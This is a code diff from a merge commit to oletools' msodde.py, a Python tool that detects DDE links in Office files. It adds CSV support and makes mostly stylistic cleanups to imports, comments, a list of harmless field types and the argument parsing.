Commit 95ca88d297935a2de9175b92152713b64d3f6e6c

Authored by Philippe Lagadec
Committed by GitHub
2 parents 56ed93a1 874a5105

Merge pull request #241 from christian-intra2net/dde-in-csv

Dde in csv
oletools/msodde.py
@@ -9,6 +9,7 @@ Supported formats: @@ -9,6 +9,7 @@ Supported formats:
9 - Word 97-2003 (.doc, .dot), Word 2007+ (.docx, .dotx, .docm, .dotm) 9 - Word 97-2003 (.doc, .dot), Word 2007+ (.docx, .dotx, .docm, .dotm)
10 - Excel 97-2003 (.xls), Excel 2007+ (.xlsx, .xlsm, .xlsb) 10 - Excel 97-2003 (.xls), Excel 2007+ (.xlsx, .xlsm, .xlsb)
11 - RTF 11 - RTF
  12 +- CSV (exported from / imported into Excel)
12 13
13 Author: Philippe Lagadec - http://www.decalage.info 14 Author: Philippe Lagadec - http://www.decalage.info
14 License: BSD, see source code or documentation 15 License: BSD, see source code or documentation
@@ -17,39 +18,72 @@ msodde is part of the python-oletools package: @@ -17,39 +18,72 @@ msodde is part of the python-oletools package:
17 http://www.decalage.info/python/oletools 18 http://www.decalage.info/python/oletools
18 """ 19 """
19 20
20 -# === LICENSE ================================================================== 21 +# === LICENSE =================================================================
21 22
22 # msodde is copyright (c) 2017 Philippe Lagadec (http://www.decalage.info) 23 # msodde is copyright (c) 2017 Philippe Lagadec (http://www.decalage.info)
23 # All rights reserved. 24 # All rights reserved.
24 # 25 #
25 -# Redistribution and use in source and binary forms, with or without modification,  
26 -# are permitted provided that the following conditions are met: 26 +# Redistribution and use in source and binary forms, with or without
  27 +# modification, are permitted provided that the following conditions are met:
27 # 28 #
28 -# * Redistributions of source code must retain the above copyright notice, this  
29 -# list of conditions and the following disclaimer. 29 +# * Redistributions of source code must retain the above copyright notice,
  30 +# this list of conditions and the following disclaimer.
30 # * Redistributions in binary form must reproduce the above copyright notice, 31 # * Redistributions in binary form must reproduce the above copyright notice,
31 # this list of conditions and the following disclaimer in the documentation 32 # this list of conditions and the following disclaimer in the documentation
32 # and/or other materials provided with the distribution. 33 # and/or other materials provided with the distribution.
33 # 34 #
34 -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND  
35 -# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED  
36 -# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE  
37 -# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE  
38 -# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL  
39 -# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR  
40 -# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER  
41 -# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,  
42 -# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE  
43 -# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 35 +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
  36 +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
  37 +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
  38 +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
  39 +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
  40 +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
  41 +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
  42 +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
  43 +# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
  44 +# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
  45 +# POSSIBILITY OF SUCH DAMAGE.
  46 +
  47 +# -- IMPORTS ------------------------------------------------------------------
44 48
45 from __future__ import print_function 49 from __future__ import print_function
46 50
47 -#------------------------------------------------------------------------------ 51 +import argparse
  52 +import zipfile
  53 +import os
  54 +from os.path import abspath, dirname
  55 +import sys
  56 +import json
  57 +import logging
  58 +import re
  59 +import csv
  60 +
  61 +# import lxml or ElementTree for XML parsing:
  62 +try:
  63 + # lxml: best performance for XML processing
  64 + import lxml.etree as ET
  65 +except ImportError:
  66 + import xml.etree.cElementTree as ET
  67 +
  68 +# little hack to allow absolute imports even if oletools is not installed
  69 +# Copied from olevba.py
  70 +PARENT_DIR = dirname(dirname(abspath(__file__)))
  71 +if PARENT_DIR not in sys.path:
  72 + sys.path.insert(0, PARENT_DIR)
  73 +del PARENT_DIR
  74 +
  75 +from oletools.thirdparty import olefile
  76 +from oletools import ooxml
  77 +from oletools import xls_parser
  78 +from oletools import rtfobj
  79 +
  80 +# -----------------------------------------------------------------------------
48 # CHANGELOG: 81 # CHANGELOG:
49 # 2017-10-18 v0.52 PL: - first version 82 # 2017-10-18 v0.52 PL: - first version
50 # 2017-10-20 PL: - fixed issue #202 (handling empty xml tags) 83 # 2017-10-20 PL: - fixed issue #202 (handling empty xml tags)
51 # 2017-10-23 ES: - add check for fldSimple codes 84 # 2017-10-23 ES: - add check for fldSimple codes
52 -# 2017-10-24 ES: - group tags and track begin/end tags to keep DDE strings together 85 +# 2017-10-24 ES: - group tags and track begin/end tags to keep DDE
  86 +# strings together
53 # 2017-10-25 CH: - add json output 87 # 2017-10-25 CH: - add json output
54 # 2017-10-25 CH: - parse doc 88 # 2017-10-25 CH: - parse doc
55 # PL: - added logging 89 # PL: - added logging
@@ -59,10 +93,11 @@ from __future__ import print_function @@ -59,10 +93,11 @@ from __future__ import print_function
59 # 2017-11-29 CH: - added support for xlsb files 93 # 2017-11-29 CH: - added support for xlsb files
60 # 2017-11-29 PL: - added support for RTF files (issue #223) 94 # 2017-11-29 PL: - added support for RTF files (issue #223)
61 # 2017-12-07 CH: - ensure rtf file is closed 95 # 2017-12-07 CH: - ensure rtf file is closed
  96 +# 2018-01-05 CH: - add CSV
62 97
63 -__version__ = '0.52dev9' 98 +__version__ = '0.52dev10'
64 99
65 -#------------------------------------------------------------------------------ 100 +# -----------------------------------------------------------------------------
66 # TODO: field codes can be in headers/footers/comments - parse these 101 # TODO: field codes can be in headers/footers/comments - parse these
67 # TODO: generalize behaviour for xlsx: find all external links (maybe rename 102 # TODO: generalize behaviour for xlsx: find all external links (maybe rename
68 # command line flag for "blacklist" to "find all suspicious" or so) 103 # command line flag for "blacklist" to "find all suspicious" or so)
@@ -71,40 +106,10 @@ __version__ = '0.52dev9' @@ -71,40 +106,10 @@ __version__ = '0.52dev9'
71 # DDE-Links 106 # DDE-Links
72 # TODO: avoid reading complete rtf file data into memory 107 # TODO: avoid reading complete rtf file data into memory
73 108
74 -#------------------------------------------------------------------------------ 109 +# -----------------------------------------------------------------------------
75 # REFERENCES: 110 # REFERENCES:
76 111
77 112
78 -#--- IMPORTS ------------------------------------------------------------------  
79 -  
80 -import argparse  
81 -import zipfile  
82 -import os  
83 -import sys  
84 -import json  
85 -import logging  
86 -import re  
87 -from struct import unpack  
88 -  
89 -# import lxml or ElementTree for XML parsing:  
90 -try:  
91 - # lxml: best performance for XML processing  
92 - import lxml.etree as ET  
93 -except ImportError:  
94 - import xml.etree.cElementTree as ET  
95 -  
96 -# little hack to allow absolute imports even if oletools is not installed  
97 -# Copied from olevba.py  
98 -_thismodule_dir = os.path.normpath(os.path.abspath(os.path.dirname(__file__)))  
99 -_parent_dir = os.path.normpath(os.path.join(_thismodule_dir, '..'))  
100 -if not _parent_dir in sys.path:  
101 - sys.path.insert(0, _parent_dir)  
102 -  
103 -from oletools.thirdparty import olefile  
104 -from oletools import ooxml  
105 -from oletools import xls_parser  
106 -from oletools import rtfobj  
107 -  
108 # === PYTHON 2+3 SUPPORT ====================================================== 113 # === PYTHON 2+3 SUPPORT ======================================================
109 114
110 if sys.version_info[0] >= 3: 115 if sys.version_info[0] >= 3:
@@ -123,7 +128,9 @@ TAG_W_P = "{%s}p" % NS_WORD @@ -123,7 +128,9 @@ TAG_W_P = "{%s}p" % NS_WORD
123 TAG_W_R = "{%s}r" % NS_WORD 128 TAG_W_R = "{%s}r" % NS_WORD
124 ATTR_W_INSTR = '{%s}instr' % NS_WORD 129 ATTR_W_INSTR = '{%s}instr' % NS_WORD
125 ATTR_W_FLDCHARTYPE = '{%s}fldCharType' % NS_WORD 130 ATTR_W_FLDCHARTYPE = '{%s}fldCharType' % NS_WORD
126 -LOCATIONS = ['word/document.xml','word/endnotes.xml','word/footnotes.xml','word/header1.xml','word/footer1.xml','word/header2.xml','word/footer2.xml','word/comments.xml'] 131 +LOCATIONS = ('word/document.xml', 'word/endnotes.xml', 'word/footnotes.xml',
  132 + 'word/header1.xml', 'word/footer1.xml', 'word/header2.xml',
  133 + 'word/footer2.xml', 'word/comments.xml')
127 134
128 # list of acceptable, harmless field instructions for blacklist field mode 135 # list of acceptable, harmless field instructions for blacklist field mode
129 # c.f. http://officeopenxml.com/WPfieldInstructions.php or the official 136 # c.f. http://officeopenxml.com/WPfieldInstructions.php or the official
@@ -133,73 +140,74 @@ LOCATIONS = ['word/document.xml','word/endnotes.xml','word/footnotes.xml','word/ @@ -133,73 +140,74 @@ LOCATIONS = ['word/document.xml','word/endnotes.xml','word/footnotes.xml','word/
133 # switches_with_args, switches_without_args, format_switches) 140 # switches_with_args, switches_without_args, format_switches)
134 FIELD_BLACKLIST = ( 141 FIELD_BLACKLIST = (
135 # date and time: 142 # date and time:
136 - ('CREATEDATE', 0, 0, '', 'hs', 'datetime'),  
137 - ('DATE', 0, 0, '', 'hls', 'datetime'),  
138 - ('EDITTIME', 0, 0, '', '', 'numeric'),  
139 - ('PRINTDATE', 0, 0, '', 'hs', 'datetime'),  
140 - ('SAVEDATE', 0, 0, '', 'hs', 'datetime'),  
141 - ('TIME', 0, 0, '', '', 'datetime'), 143 + ('CREATEDATE', 0, 0, '', 'hs', 'datetime'), # pylint: disable=bad-whitespace
  144 + ('DATE', 0, 0, '', 'hls', 'datetime'), # pylint: disable=bad-whitespace
  145 + ('EDITTIME', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
  146 + ('PRINTDATE', 0, 0, '', 'hs', 'datetime'), # pylint: disable=bad-whitespace
  147 + ('SAVEDATE', 0, 0, '', 'hs', 'datetime'), # pylint: disable=bad-whitespace
  148 + ('TIME', 0, 0, '', '', 'datetime'), # pylint: disable=bad-whitespace
142 # exclude document automation (we hate the "auto" in "automation") 149 # exclude document automation (we hate the "auto" in "automation")
143 # (COMPARE, DOCVARIABLE, GOTOBUTTON, IF, MACROBUTTON, PRINT) 150 # (COMPARE, DOCVARIABLE, GOTOBUTTON, IF, MACROBUTTON, PRINT)
144 # document information 151 # document information
145 - ('AUTHOR', 0, 1, '', '', 'string'),  
146 - ('COMMENTS', 0, 1, '', '', 'string'),  
147 - ('DOCPROPERTY', 1, 0, '', '', 'string/numeric/datetime'),  
148 - ('FILENAME', 0, 0, '', 'p', 'string'),  
149 - ('FILESIZE', 0, 0, '', 'km', 'numeric'),  
150 - ('KEYWORDS', 0, 1, '', '', 'string'),  
151 - ('LASTSAVEDBY', 0, 0, '', '', 'string'),  
152 - ('NUMCHARS', 0, 0, '', '', 'numeric'),  
153 - ('NUMPAGES', 0, 0, '', '', 'numeric'),  
154 - ('NUMWORDS', 0, 0, '', '', 'numeric'),  
155 - ('SUBJECT', 0, 1, '', '', 'string'),  
156 - ('TEMPLATE', 0, 0, '', 'p', 'string'),  
157 - ('TITLE', 0, 1, '', '', 'string'), 152 + ('AUTHOR', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
  153 + ('COMMENTS', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
  154 + ('DOCPROPERTY', 1, 0, '', '', 'string/numeric/datetime'), # pylint: disable=bad-whitespace
  155 + ('FILENAME', 0, 0, '', 'p', 'string'), # pylint: disable=bad-whitespace
  156 + ('FILESIZE', 0, 0, '', 'km', 'numeric'), # pylint: disable=bad-whitespace
  157 + ('KEYWORDS', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
  158 + ('LASTSAVEDBY', 0, 0, '', '', 'string'), # pylint: disable=bad-whitespace
  159 + ('NUMCHARS', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
  160 + ('NUMPAGES', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
  161 + ('NUMWORDS', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
  162 + ('SUBJECT', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
  163 + ('TEMPLATE', 0, 0, '', 'p', 'string'), # pylint: disable=bad-whitespace
  164 + ('TITLE', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
158 # equations and formulas 165 # equations and formulas
159 - # exlude '=' formulae because they have different syntax  
160 - ('ADVANCE', 0, 0, 'dlruxy', '', ''),  
161 - ('SYMBOL', 1, 0, 'fs', 'ahju', ''), 166 + # exlude '=' formulae because they have different syntax (and can be bad)
  167 + ('ADVANCE', 0, 0, 'dlruxy', '', ''), # pylint: disable=bad-whitespace
  168 + ('SYMBOL', 1, 0, 'fs', 'ahju', ''), # pylint: disable=bad-whitespace
162 # form fields 169 # form fields
163 - ('FORMCHECKBOX', 0, 0, '', '', ''),  
164 - ('FORMDROPDOWN', 0, 0, '', '', ''),  
165 - ('FORMTEXT', 0, 0, '', '', ''), 170 + ('FORMCHECKBOX', 0, 0, '', '', ''), # pylint: disable=bad-whitespace
  171 + ('FORMDROPDOWN', 0, 0, '', '', ''), # pylint: disable=bad-whitespace
  172 + ('FORMTEXT', 0, 0, '', '', ''), # pylint: disable=bad-whitespace
166 # index and tables 173 # index and tables
167 - ('INDEX', 0, 0, 'bcdefghklpsz', 'ry', ''), 174 + ('INDEX', 0, 0, 'bcdefghklpsz', 'ry', ''), # pylint: disable=bad-whitespace
168 # exlude RD since that imports data from other files 175 # exlude RD since that imports data from other files
169 - ('TA', 0, 0, 'clrs', 'bi', ''),  
170 - ('TC', 1, 0, 'fl', 'n', ''),  
171 - ('TOA', 0, 0, 'bcdegls', 'fhp', ''),  
172 - ('TOC', 0, 0, 'abcdflnopst', 'huwxz', ''),  
173 - ('XE', 1, 0, 'frty', 'bi', ''), 176 + ('TA', 0, 0, 'clrs', 'bi', ''), # pylint: disable=bad-whitespace
  177 + ('TC', 1, 0, 'fl', 'n', ''), # pylint: disable=bad-whitespace
  178 + ('TOA', 0, 0, 'bcdegls', 'fhp', ''), # pylint: disable=bad-whitespace
  179 + ('TOC', 0, 0, 'abcdflnopst', 'huwxz', ''), # pylint: disable=bad-whitespace
  180 + ('XE', 1, 0, 'frty', 'bi', ''), # pylint: disable=bad-whitespace
174 # links and references 181 # links and references
175 # exclude AUTOTEXT and AUTOTEXTLIST since we do not like stuff with 'AUTO' 182 # exclude AUTOTEXT and AUTOTEXTLIST since we do not like stuff with 'AUTO'
176 - ('BIBLIOGRAPHY', 0, 0, 'lfm', '', ''),  
177 - ('CITATION', 1, 0, 'lfspvm', 'nty', ''), 183 + ('BIBLIOGRAPHY', 0, 0, 'lfm', '', ''), # pylint: disable=bad-whitespace
  184 + ('CITATION', 1, 0, 'lfspvm', 'nty', ''), # pylint: disable=bad-whitespace
178 # exclude HYPERLINK since we are allergic to URLs 185 # exclude HYPERLINK since we are allergic to URLs
179 # exclude INCLUDEPICTURE and INCLUDETEXT (other file or maybe even URL?) 186 # exclude INCLUDEPICTURE and INCLUDETEXT (other file or maybe even URL?)
180 # exclude LINK and REF (could reference other files) 187 # exclude LINK and REF (could reference other files)
181 - ('NOTEREF', 1, 0, '', 'fhp', ''),  
182 - ('PAGEREF', 1, 0, '', 'hp', ''),  
183 - ('QUOTE', 1, 0, '', '', 'datetime'),  
184 - ('STYLEREF', 1, 0, '', 'lnprtw', ''), 188 + ('NOTEREF', 1, 0, '', 'fhp', ''), # pylint: disable=bad-whitespace
  189 + ('PAGEREF', 1, 0, '', 'hp', ''), # pylint: disable=bad-whitespace
  190 + ('QUOTE', 1, 0, '', '', 'datetime'), # pylint: disable=bad-whitespace
  191 + ('STYLEREF', 1, 0, '', 'lnprtw', ''), # pylint: disable=bad-whitespace
185 # exclude all Mail Merge commands since they import data from other files 192 # exclude all Mail Merge commands since they import data from other files
186 # (ADDRESSBLOCK, ASK, COMPARE, DATABASE, FILLIN, GREETINGLINE, IF, 193 # (ADDRESSBLOCK, ASK, COMPARE, DATABASE, FILLIN, GREETINGLINE, IF,
187 # MERGEFIELD, MERGEREC, MERGESEQ, NEXT, NEXTIF, SET, SKIPIF) 194 # MERGEFIELD, MERGEREC, MERGESEQ, NEXT, NEXTIF, SET, SKIPIF)
188 # Numbering 195 # Numbering
189 - ('LISTNUM', 0, 1, 'ls', '', ''),  
190 - ('PAGE', 0, 0, '', '', 'numeric'),  
191 - ('REVNUM', 0, 0, '', '', ''),  
192 - ('SECTION', 0, 0, '', '', 'numeric'),  
193 - ('SECTIONPAGES', 0, 0, '', '', 'numeric'),  
194 - ('SEQ', 1, 1, 'rs', 'chn', 'numeric'),  
195 - # user information  
196 - ('USERADDRESS', 0, 1, '', '', 'string'),  
197 - ('USERINITIALS', 0, 1, '', '', 'string'),  
198 - ('USERNAME', 0, 1, '', '', 'string'), 196 + ('LISTNUM', 0, 1, 'ls', '', ''), # pylint: disable=bad-whitespace
  197 + ('PAGE', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
  198 + ('REVNUM', 0, 0, '', '', ''), # pylint: disable=bad-whitespace
  199 + ('SECTION', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
  200 + ('SECTIONPAGES', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
  201 + ('SEQ', 1, 1, 'rs', 'chn', 'numeric'), # pylint: disable=bad-whitespace
  202 + # user information # pylint: disable=bad-whitespace
  203 + ('USERADDRESS', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
  204 + ('USERINITIALS', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
  205 + ('USERNAME', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
199 ) 206 )
200 207
201 FIELD_DDE_REGEX = re.compile(r'^\s*dde(auto)?\s+', re.I) 208 FIELD_DDE_REGEX = re.compile(r'^\s*dde(auto)?\s+', re.I)
202 209
  210 +# filter modes
203 FIELD_FILTER_DDE = 'only dde' 211 FIELD_FILTER_DDE = 'only dde'
204 FIELD_FILTER_BLACKLIST = 'exclude blacklisted' 212 FIELD_FILTER_BLACKLIST = 'exclude blacklisted'
205 FIELD_FILTER_ALL = 'keep all' 213 FIELD_FILTER_ALL = 'keep all'
@@ -229,6 +237,7 @@ LOG_LEVELS = { @@ -229,6 +237,7 @@ LOG_LEVELS = {
229 'critical': logging.CRITICAL 237 'critical': logging.CRITICAL
230 } 238 }
231 239
  240 +
232 class NullHandler(logging.Handler): 241 class NullHandler(logging.Handler):
233 """ 242 """
234 Log Handler without output, to avoid printing messages if logging is not 243 Log Handler without output, to avoid printing messages if logging is not
@@ -239,6 +248,7 @@ class NullHandler(logging.Handler): @@ -239,6 +248,7 @@ class NullHandler(logging.Handler):
239 def emit(self, record): 248 def emit(self, record):
240 pass 249 pass
241 250
  251 +
242 def get_logger(name, level=logging.CRITICAL+1): 252 def get_logger(name, level=logging.CRITICAL+1):
243 """ 253 """
244 Create a suitable logger object for this module. 254 Create a suitable logger object for this module.
@@ -251,7 +261,7 @@ def get_logger(name, level=logging.CRITICAL+1): @@ -251,7 +261,7 @@ def get_logger(name, level=logging.CRITICAL+1):
251 # First, test if there is already a logger with the same name, else it 261 # First, test if there is already a logger with the same name, else it
252 # will generate duplicate messages (due to duplicate handlers): 262 # will generate duplicate messages (due to duplicate handlers):
253 if name in logging.Logger.manager.loggerDict: 263 if name in logging.Logger.manager.loggerDict:
254 - #NOTE: another less intrusive but more "hackish" solution would be to 264 + # NOTE: another less intrusive but more "hackish" solution would be to
255 # use getLogger then test if its effective level is not default. 265 # use getLogger then test if its effective level is not default.
256 logger = logging.getLogger(name) 266 logger = logging.getLogger(name)
257 # make sure level is OK: 267 # make sure level is OK:
@@ -292,8 +302,8 @@ def ensure_stdout_handles_unicode(): @@ -292,8 +302,8 @@ def ensure_stdout_handles_unicode():
292 # try to find encoding for sys.stdout 302 # try to find encoding for sys.stdout
293 encoding = None 303 encoding = None
294 try: 304 try:
295 - encoding = sys.stdout.encoding # variable encoding might not exist  
296 - except Exception: 305 + encoding = sys.stdout.encoding
  306 + except AttributeError: # variable "encoding" might not exist
297 pass 307 pass
298 308
299 if encoding not in (None, '', 'ascii'): 309 if encoding not in (None, '', 'ascii'):
@@ -316,7 +326,8 @@ def ensure_stdout_handles_unicode(): @@ -316,7 +326,8 @@ def ensure_stdout_handles_unicode():
316 sys.stdout = wrapper(sys.stdout) 326 sys.stdout = wrapper(sys.stdout)
317 327
318 328
319 -ensure_stdout_handles_unicode() # e.g. for print(text) in main() 329 +if sys.version_info.major < 3:
  330 + ensure_stdout_handles_unicode() # e.g. for print(text) in main()
320 331
321 332
322 # === ARGUMENT PARSING ======================================================= 333 # === ARGUMENT PARSING =======================================================
@@ -338,28 +349,34 @@ def existing_file(filename): @@ -338,28 +349,34 @@ def existing_file(filename):
338 349
339 def process_args(cmd_line_args=None): 350 def process_args(cmd_line_args=None):
340 """ parse command line arguments (given ones or per default sys.argv) """ 351 """ parse command line arguments (given ones or per default sys.argv) """
341 - parser = ArgParserWithBanner(description='A python tool to detect and extract DDE links in MS Office files') 352 + parser = ArgParserWithBanner(description='A python tool to detect and '
  353 + 'extract DDE links in MS Office files')
342 parser.add_argument("filepath", help="path of the file to be analyzed", 354 parser.add_argument("filepath", help="path of the file to be analyzed",
343 type=existing_file, metavar='FILE') 355 type=existing_file, metavar='FILE')
344 parser.add_argument('-j', "--json", action='store_true', 356 parser.add_argument('-j', "--json", action='store_true',
345 help="Output in json format. Do not use with -ldebug") 357 help="Output in json format. Do not use with -ldebug")
346 - parser.add_argument("--nounquote", help="don't unquote values",action='store_true')  
347 - parser.add_argument('-l', '--loglevel', dest="loglevel", action="store", default=DEFAULT_LOG_LEVEL,  
348 - help="logging level debug/info/warning/error/critical (default=%(default)s)") 358 + parser.add_argument("--nounquote", help="don't unquote values",
  359 + action='store_true')
  360 + parser.add_argument('-l', '--loglevel', dest="loglevel", action="store",
  361 + default=DEFAULT_LOG_LEVEL,
  362 + help="logging level debug/info/warning/error/critical "
  363 + "(default=%(default)s)")
349 filter_group = parser.add_argument_group( 364 filter_group = parser.add_argument_group(
350 - title='Filter which OpenXML field commands are returned',  
351 - description='Only applies to OpenXML (e.g. docx) and rtf, not to OLE '  
352 - '(e.g. .doc). These options are mutually exclusive, last '  
353 - 'option found on command line overwrites earlier ones.') 365 + title='Filter which OpenXML field commands are returned',
  366 + description='Only applies to OpenXML (e.g. docx) and rtf, not to OLE '
  367 + '(e.g. .doc). These options are mutually exclusive, last '
  368 + 'option found on command line overwrites earlier ones.')
354 filter_group.add_argument('-d', '--dde-only', action='store_const', 369 filter_group.add_argument('-d', '--dde-only', action='store_const',
355 dest='field_filter_mode', const=FIELD_FILTER_DDE, 370 dest='field_filter_mode', const=FIELD_FILTER_DDE,
356 help='Return only DDE and DDEAUTO fields') 371 help='Return only DDE and DDEAUTO fields')
357 filter_group.add_argument('-f', '--filter', action='store_const', 372 filter_group.add_argument('-f', '--filter', action='store_const',
358 - dest='field_filter_mode', const=FIELD_FILTER_BLACKLIST,  
359 - help='Return all fields except harmless ones like PAGE') 373 + dest='field_filter_mode',
  374 + const=FIELD_FILTER_BLACKLIST,
  375 + help='Return all fields except harmless ones')
360 filter_group.add_argument('-a', '--all-fields', action='store_const', 376 filter_group.add_argument('-a', '--all-fields', action='store_const',
361 dest='field_filter_mode', const=FIELD_FILTER_ALL, 377 dest='field_filter_mode', const=FIELD_FILTER_ALL,
362 - help='Return all fields, irrespective of their contents') 378 + help='Return all fields, irrespective of their '
  379 + 'contents')
363 parser.set_defaults(field_filter_mode=FIELD_FILTER_DEFAULT) 380 parser.set_defaults(field_filter_mode=FIELD_FILTER_DEFAULT)
364 381
365 return parser.parse_args(cmd_line_args) 382 return parser.parse_args(cmd_line_args)
@@ -368,16 +385,19 @@ def process_args(cmd_line_args=None): @@ -368,16 +385,19 @@ def process_args(cmd_line_args=None):
368 # === FUNCTIONS ============================================================== 385 # === FUNCTIONS ==============================================================
369 386
370 # from [MS-DOC], section 2.8.25 (PlcFld): 387 # from [MS-DOC], section 2.8.25 (PlcFld):
371 -# A field consists of two parts: field instructions and, optionally, a result. All fields MUST begin with  
372 -# Unicode character 0x0013 with sprmCFSpec applied with a value of 1. This is the field begin  
373 -# character. All fields MUST end with a Unicode character 0x0015 with sprmCFSpec applied with a value  
374 -# of 1. This is the field end character. If the field has a result, then there MUST be a Unicode character  
375 -# 0x0014 with sprmCFSpec applied with a value of 1 somewhere between the field begin character and  
376 -# the field end character. This is the field separator. The field result is the content between the field  
377 -# separator and the field end character. The field instructions are the content between the field begin  
378 -# character and the field separator, if one is present, or between the field begin character and the field  
379 -# end character if no separator is present. The field begin character, field end character, and field  
380 -# separator are collectively referred to as field characters. 388 +# A field consists of two parts: field instructions and, optionally, a result.
  389 +# All fields MUST begin with Unicode character 0x0013 with sprmCFSpec applied
  390 +# with a value of 1. This is the field begin character. All fields MUST end
  391 +# with a Unicode character 0x0015 with sprmCFSpec applied with a value of 1.
  392 +# This is the field end character. If the field has a result, then there MUST
  393 +# be a Unicode character 0x0014 with sprmCFSpec applied with a value of 1
  394 +# somewhere between the field begin character and the field end character. This
  395 +# is the field separator. The field result is the content between the field
  396 +# separator and the field end character. The field instructions are the content
  397 +# between the field begin character and the field separator, if one is present,
  398 +# or between the field begin character and the field end character if no
  399 +# separator is present. The field begin character, field end character, and
  400 +# field separator are collectively referred to as field characters.
381 401
382 402
383 def process_doc_field(data): 403 def process_doc_field(data):
@@ -387,7 +407,6 @@ def process_doc_field(data): @@ -387,7 +407,6 @@ def process_doc_field(data):
387 log.debug('processing field \'{0}\''.format(data)) 407 log.debug('processing field \'{0}\''.format(data))
388 408
389 if data.lstrip().lower().startswith(u'dde'): 409 if data.lstrip().lower().startswith(u'dde'):
390 - #log.debug('--> is DDE!')  
391 return data 410 return data
392 elif data.lstrip().lower().startswith(u'\x00d\x00d\x00e\x00'): 411 elif data.lstrip().lower().startswith(u'\x00d\x00d\x00e\x00'):
393 return data 412 return data
@@ -512,7 +531,6 @@ def process_doc(filepath): @@ -512,7 +531,6 @@ def process_doc(filepath):
512 return u'\n'.join(links) 531 return u'\n'.join(links)
513 532
514 533
515 -  
516 def process_xls(filepath): 534 def process_xls(filepath):
517 """ find dde links in excel ole file """ 535 """ find dde links in excel ole file """
518 536
@@ -531,17 +549,15 @@ def process_xls(filepath): @@ -531,17 +549,15 @@ def process_xls(filepath):
531 549
532 550
533 def process_docx(filepath, field_filter_mode=None): 551 def process_docx(filepath, field_filter_mode=None):
  552 + """ find dde-links (and other fields) in Word 2007+ files """
534 log.debug('process_docx') 553 log.debug('process_docx')
535 all_fields = [] 554 all_fields = []
536 - with zipfile.ZipFile(filepath) as z:  
537 - for filepath in z.namelist(): 555 + with zipfile.ZipFile(filepath) as zipper:
  556 + for filepath in zipper.namelist():
538 if filepath in LOCATIONS: 557 if filepath in LOCATIONS:
539 - data = z.read(filepath) 558 + data = zipper.read(filepath)
540 fields = process_xml(data) 559 fields = process_xml(data)
541 if len(fields) > 0: 560 if len(fields) > 0:
542 - #print ('DDE Links in %s:'%filepath)  
543 - #for f in fields:  
544 - # print(f)  
545 all_fields.extend(fields) 561 all_fields.extend(fields)
546 562
547 # apply field command filter 563 # apply field command filter
@@ -560,8 +576,10 @@ def process_docx(filepath, field_filter_mode=None): @@ -560,8 +576,10 @@ def process_docx(filepath, field_filter_mode=None):
560 .format(field_filter_mode)) 576 .format(field_filter_mode))
561 577
562 return u'\n'.join(clean_fields) 578 return u'\n'.join(clean_fields)
563 - 579 +
  580 +
564 def process_xml(data): 581 def process_xml(data):
  582 + """ Find dde-links and other fields in office XML data """
565 # parse the XML data: 583 # parse the XML data:
566 root = ET.fromstring(data) 584 root = ET.fromstring(data)
567 fields = [] 585 fields = []
@@ -569,39 +587,41 @@ def process_xml(data): @@ -569,39 +587,41 @@ def process_xml(data):
569 level = 0 587 level = 0
570 # find all the tags 'w:p': 588 # find all the tags 'w:p':
571 # parse each for begin and end tags, to group DDE strings 589 # parse each for begin and end tags, to group DDE strings
572 - # fldChar can be in either a w:r element, floating alone in the w:p or spread accross w:p tags 590 + # fldChar can be in either a w:r element, floating alone in the w:p
  591 + # or spread accross w:p tags
573 # escape DDE if quoted etc 592 # escape DDE if quoted etc
574 # (each is a chunk of a DDE link) 593 # (each is a chunk of a DDE link)
575 594
576 for subs in root.iter(TAG_W_P): 595 for subs in root.iter(TAG_W_P):
577 elem = None 596 elem = None
578 - for e in subs:  
579 - #check if w:r and if it is parse children elements to pull out the first FLDCHAR or INSTRTEXT  
580 - if e.tag == TAG_W_R:  
581 - for child in e:  
